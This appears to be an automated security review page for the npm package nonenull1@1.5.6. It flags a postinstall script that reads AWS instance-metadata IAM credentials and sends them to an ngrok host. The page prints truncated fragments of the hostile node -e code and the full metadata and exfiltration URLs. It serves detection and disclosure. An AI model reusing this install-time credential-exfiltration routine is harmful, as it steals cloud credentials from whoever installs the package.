registry  /  nonenull1  /  1.5.6

nonenull1@1.5.6

AI Security Review

scanned 4h ago · by lpm-firewall-ai

The package contains an automatic install-time credential theft routine in package.json. It targets AWS instance metadata credentials and exfiltrates results to an ngrok host.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install or any install path that runs postinstall
Impact
Steals cloud IAM role credentials from hosts with reachable AWS metadata service.
Mechanism
install-time AWS metadata credential exfiltration
Attack narrative
On npm install, the postinstall script runs inline Node code. It obtains an AWS IMDSv2 token from 169.254.169.254, queries the IAM security-credentials metadata path for a role name, retrieves that role's credentials, then POSTs the role and credential response to crabbing-thong-overhung.ngrok-free.dev. Error paths also beacon status to the same exfiltration host.
Rationale
Direct source inspection confirms automatic postinstall access to AWS metadata credentials and outbound exfiltration to an unrelated ngrok endpoint. This is concrete credential theft with no package-aligned purpose.
Evidence
package.jsonpackage.json#scripts.postinstall
Network endpoints3
169.254.169.254/latest/api/token169.254.169.254/latest/meta-data/iam/security-credentials/crabbing-thong-overhung.ngrok-free.dev/?real_aws_keys=1

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json is the only package file and defines a postinstall lifecycle hook.
  • package.json postinstall runs node -e at install time.
  • Script requests AWS IMDSv2 token from 169.254.169.254/latest/api/token.
  • Script reads IAM role and credentials from /latest/meta-data/iam/security-credentials/.
  • Script POSTs collected role/creds or status data to crabbing-thong-overhung.ngrok-free.dev/?real_aws_keys=1.
Evidence against
  • No benign package code, README, main entrypoint, or package-aligned functionality present.
  • No user-invoked command gating; behavior is automatic during npm install.
Behavioral surface
SourceNo risky source behavior triggered.
Supply chainNo supply-chain packaging signals triggered.
Manifest
NoLicense
scanned 0 file(s), 0 B of source

Source & flagged code

3 flagged · loading source
package.jsonView file
scripts.postinstall = node -e "const http=require('http'),https=require('https');function exfil(d){let b=JSON.stringify(d);let r=https.request({hostname:'crabbing-thong-overhung.ngrok-free.dev',path:'/?...
Critical
Red Install Lifecycle Script

Install-time lifecycle script matches a deterministic static-gate block pattern.

package.jsonView on unpkg
scripts.postinstall = node -e "const http=require('http'),https=require('https');function exfil(d){let b=JSON.stringify(d);let r=https.request({hostname:'crabbing-thong-overhung.ngrok-free.dev',path:'/?...
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
package.json#scripts.postinstallView file
1"const http=require('http'),https=require('https');function exfil(d){let b=JSON.stringify(d);let r=https.request({hostname:'crabbing-thong-overhung.ngrok-free.dev',path:'/?real_aws...
High
Cloud Metadata Access

Source reaches cloud instance metadata or link-local credential endpoints.

package.json#scripts.postinstallView on unpkg · L1

Findings

1 Critical2 High2 Low
CriticalRed Install Lifecycle Scriptpackage.json
HighInstall Time Lifecycle Scriptspackage.json
HighCloud Metadata Accesspackage.json#scripts.postinstall
LowScripts Present
LowNo License